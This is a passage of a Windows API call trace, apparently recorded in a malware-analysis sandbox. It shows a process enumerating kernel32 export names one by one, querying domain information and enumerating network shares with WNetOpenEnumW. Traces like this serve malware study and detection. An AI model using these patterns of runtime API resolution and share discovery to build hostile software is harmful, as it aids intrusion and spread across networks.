lpString1=0x239e35c, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0163.271] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0163.271] lstrcpyA (in: lpString1=0x239e35c, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0163.272] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0163.272] lstrcpyA (in: lpString1=0x239e35c, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0163.272] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0163.272] lstrcpyA (in: lpString1=0x239e35c, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0163.272] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0163.272] lstrcpyA (in: lpString1=0x239e35c, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0163.272] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0163.272] lstrcpyA (in: lpString1=0x239e35c, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0163.272] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0163.272] lstrcpyA (in: lpString1=0x239e35c, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0163.272] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0163.272] lstrcpyA (in: lpString1=0x239e35c, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0163.272] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0163.272] lstrcpyA (in: lpString1=0x239e35c, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0163.272] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0163.272] lstrcpyA (in: lpString1=0x239e35c, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0163.272] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0163.272] lstrcpyA (in: lpString1=0x239e35c, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0163.272] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0163.272] lstrcpyA (in: lpString1=0x239e35c, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0163.272] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0163.272] lstrcpyA (in: lpString1=0x239e35c, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0163.272] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0163.272] lstrcpyA (in: lpString1=0x239e35c, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0163.272] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0163.272] lstrcpyA (in: lpString1=0x239e35c, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0163.272] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0163.272] lstrcpyA (in: lpString1=0x239e35c, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0163.272] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0163.272] lstrcpyA (in: lpString1=0x239e35c, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0163.272] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0163.272] lstrcpyA (in: lpString1=0x239e35c, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0163.272] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0163.272] lstrcpyA (in: lpString1=0x239e35c, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0163.272] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0163.272] lstrcpyA (in: lpString1=0x239e35c, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0163.272] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0163.272] lstrcpyA (in: lpString1=0x239e35c, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0163.272] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0163.273] lstrcpyA (in: lpString1=0x239e35c, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0163.273] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0163.273] lstrcpyA (in: lpString1=0x239e35c, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0163.273] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0163.273] lstrcpyA (in: lpString1=0x239e35c, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0163.273] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0163.273] lstrcpyA (in: lpString1=0x239e35c, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0163.273] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0163.273] lstrcpyA (in: lpString1=0x239e35c, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0163.273] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0163.273] lstrcpyA (in: lpString1=0x239e35c, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0163.273] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0163.273] lstrcpyA (in: lpString1=0x239e35c, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0163.273] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0163.273] lstrcpyA (in: lpString1=0x239e35c, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0163.273] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0163.273] lstrcpyA (in: lpString1=0x239e35c, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0163.273] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0163.273] lstrcpyA (in: lpString1=0x239e35c, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0163.273] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0163.273] lstrcpyA (in: lpString1=0x239e35c, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0163.273] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0163.273] lstrcpyA (in: lpString1=0x239e35c, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0163.273] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0163.273] lstrcpyA (in: lpString1=0x239e35c, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0163.273] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0163.273] lstrcpyA (in: lpString1=0x239e35c, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0163.273] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0163.273] lstrcpyA (in: lpString1=0x239e35c, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0163.273] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0163.273] lstrcpyA (in: lpString1=0x239e35c, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0163.273] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0163.273] lstrcpyA (in: lpString1=0x239e35c, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0163.273] lstrlenA (lpString="COPYCONTEXT") returned 11 [0163.273] lstrcpyA (in: lpString1=0x239e35c, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0163.273] lstrlenA (lpString="COPYFILEA") returned 9 [0163.273] lstrcpyA (in: lpString1=0x239e35c, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0163.273] lstrlenA (lpString="COPYFILEEXA") returned 11 [0163.274] lstrcpyA (in: lpString1=0x239e35c, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0163.274] lstrlenA (lpString="COPYFILEEXW") returned 11 [0163.274] lstrcpyA (in: lpString1=0x239e35c, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0163.274] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0163.274] lstrcpyA (in: lpString1=0x239e35c, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0163.274] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0163.274] lstrcpyA (in: lpString1=0x239e35c, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0163.274] lstrlenA (lpString="COPYFILEW") returned 9 [0163.274] lstrcpyA (in: lpString1=0x239e35c, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0163.274] lstrlenA (lpString="COPYLZFILE") returned 10 [0163.274] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0163.274] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0163.274] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0163.274] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0163.274] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0163.274] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0163.274] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0163.274] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0163.274] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0163.274] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0163.274] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0163.274] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0163.274] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0163.274] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0163.274] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0163.274] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0163.274] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0163.274] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0163.274] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0163.274] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0163.274] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0163.274] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0163.274] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0163.274] lstrlenA (lpString="CREATEEVENTA") returned 12 [0163.274] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0163.274] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0163.274] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0163.274] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0163.274] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0163.275] lstrlenA (lpString="CREATEEVENTW") returned 12 [0163.275] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0163.275] lstrlenA (lpString="CREATEFIBER") returned 11 [0163.275] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0163.275] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0163.275] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0163.275] lstrlenA (lpString="CREATEFILEA") returned 11 [0163.275] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0163.275] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0163.275] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0163.275] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0163.275] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0163.275] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0163.275] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0163.275] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0163.275] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0163.275] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0163.275] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0163.275] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0163.275] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0163.275] lstrlenA (lpString="CREATEFILEW") returned 11 [0163.275] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0163.275] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0163.275] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0163.275] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0163.275] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0163.275] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0163.275] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0163.275] lstrcpyA (in: lpString1=0x239e35c, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0163.276] lstrcpyW (in: lpString1=0x1a0000, lpString2="none|" | out: lpString1="none|") returned="none|" [0163.276] DsRoleGetPrimaryDomainInformation () returned 0x0 [0163.277] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x13, lpNetResource=0x0, lphEnum=0x239efb8 | out: lphEnum=0x239efb8*=0x479638) returned 0x0 [0163.732] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x3000, flProtect=0x4) returned 0x2d0000 [0163.732] WNetEnumResourceW (in: hEnum=0x479638, lpcCount=0x239efbc, lpBuffer=0x2d0000, lpBufferSize=0x239efb4 | out: lpcCount=0x239efbc, lpBuffer=0x2d0000, lpBufferSize=0x239efb4) returned 0x0 [0163.733] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x13, lpNetResource=0x2d0000, lphEnum=0x239ef88 | out: lphEnum=0x239ef88*=0x4621c8) returned 0x0 [0164.410] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x3000, flProtect=0x4) returned 0x360000 [0164.411] WNetEnumResourceW (in: hEnum=0x4621c8, lpcCount=0x239ef8c, lpBuffer=0x360000, lpBufferSize=0x239ef84 | out: lpcCount=0x239ef8c, lpBuffer=0x360000, lpBufferSize=0x239ef84) returned 0x103 [0164.411] WNetCloseEnum (hEnum=0x4621c8) returned 0x0 [0164.412] WNetEnumResourceW (in: hEnum=0x479638, lpcCount=0x239efbc, lpBuffer=0x2d0000, lpBufferSize=0x239efb4 | out: lpcCount=0x239efbc, lpBuffer=0x2d0000, lpBufferSize=0x239efb4) returned 0x0 [0164.412] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x13, lpNetResource=0x2d0000, lphEnum=0x239ef88 | out: lphEnum=0x239ef88*=0xffffffff) returned 0x4b8 [0178.250] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0178.250] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0178.251] lstrcpyA (in: lpString1=0x239e328, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0178.251] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0178.251] lstrcpyA (in: lpString1=0x239e328, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0178.251] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0178.251] lstrcpyA (in: lpString1=0x239e328, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0178.251] lstrlenA (lpString="ADDATOMA") returned 8 [0178.251] lstrcpyA (in: lpString1=0x239e328, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0178.251] lstrlenA (lpString="ADDATOMW") returned 8 [0178.251] lstrcpyA (in: lpString1=0x239e328, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0178.251] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0178.251] lstrcpyA (in: lpString1=0x239e328, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0178.251] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0178.251] lstrcpyA (in: lpString1=0x239e328, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0178.251] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0178.251] lstrcpyA (in: lpString1=0x239e328, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0178.251] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0178.251] lstrcpyA (in: lpString1=0x239e328, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0178.251] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0178.251] lstrcpyA (in: lpString1=0x239e328, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0178.251] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0178.251] lstrcpyA (in: lpString1=0x239e328, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0178.251] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0178.251] lstrcpyA (in: lpString1=0x239e328, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0178.251] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0178.251] lstrcpyA (in: lpString1=0x239e328, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0178.251] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0178.251] lstrcpyA (in: lpString1=0x239e328, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0178.251] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0178.251] lstrcpyA (in: lpString1=0x239e328, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0178.251] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0178.251] lstrcpyA (in: lpString1=0x239e328, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0178.251] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0178.251] lstrcpyA (in: lpString1=0x239e328, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0178.251] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0178.251] lstrcpyA (in: lpString1=0x239e328, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0178.251] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0178.252] lstrcpyA (in: lpString1=0x239e328, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0178.252] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0178.252] lstrcpyA (in: lpString1=0x239e328, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0178.252] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0178.252] lstrcpyA (in: lpString1=0x239e328, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0178.252] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0178.252] lstrcpyA (in: lpString1=0x239e328, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0178.252] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0178.252] lstrcpyA (in: lpString1=0x239e328, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0178.252] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0178.252] lstrcpyA (in: lpString1=0x239e328, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0178.252] lstrlenA (lpString="BACKUPREAD") returned 10 [0178.252] lstrcpyA (in: lpString1=0x239e328, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0178.252] lstrlenA (lpString="BACKUPSEEK") returned 10 [0178.252] lstrcpyA (in: lpString1=0x239e328, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0178.252] lstrlenA (lpString="BACKUPWRITE") returned 11 [0178.252] lstrcpyA (in: lpString1=0x239e328, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0178.252] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0178.252] lstrcpyA (in: lpString1=0x239e328, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0178.252] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0178.252] lstrcpyA (in: lpString1=0x239e328, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0178.252] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0178.252] lstrcpyA (in: lpString1=0x239e328, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0178.252] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0178.252] lstrcpyA (in: lpString1=0x239e328, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0178.252] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0178.252] lstrcpyA (in: lpString1=0x239e328, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0178.252] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0178.252] lstrcpyA (in: lpString1=0x239e328, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0178.252] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0178.252] lstrcpyA (in: lpString1=0x239e328, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0178.252] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0178.252] lstrcpyA (in: lpString1=0x239e328, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0178.252] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0178.252] lstrcpyA (in: lpString1=0x239e328, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0178.252] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0178.252] lstrcpyA (in: lpString1=0x239e328, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0178.253] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0178.253] lstrcpyA (in: lpString1=0x239e328, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0178.253] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0178.253] lstrcpyA (in: lpString1=0x239e328, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0178.253] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0178.253] lstrcpyA (in: lpString1=0x239e328, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0178.253] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0178.253] lstrcpyA (in: lpString1=0x239e328, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0178.253] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0178.253] lstrcpyA (in: lpString1=0x239e328, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0178.253] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0178.253] lstrcpyA (in: lpString1=0x239e328, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0178.253] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0178.253] lstrcpyA (in: lpString1=0x239e328, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0178.253] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0178.253] lstrcpyA (in: lpString1=0x239e328, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") 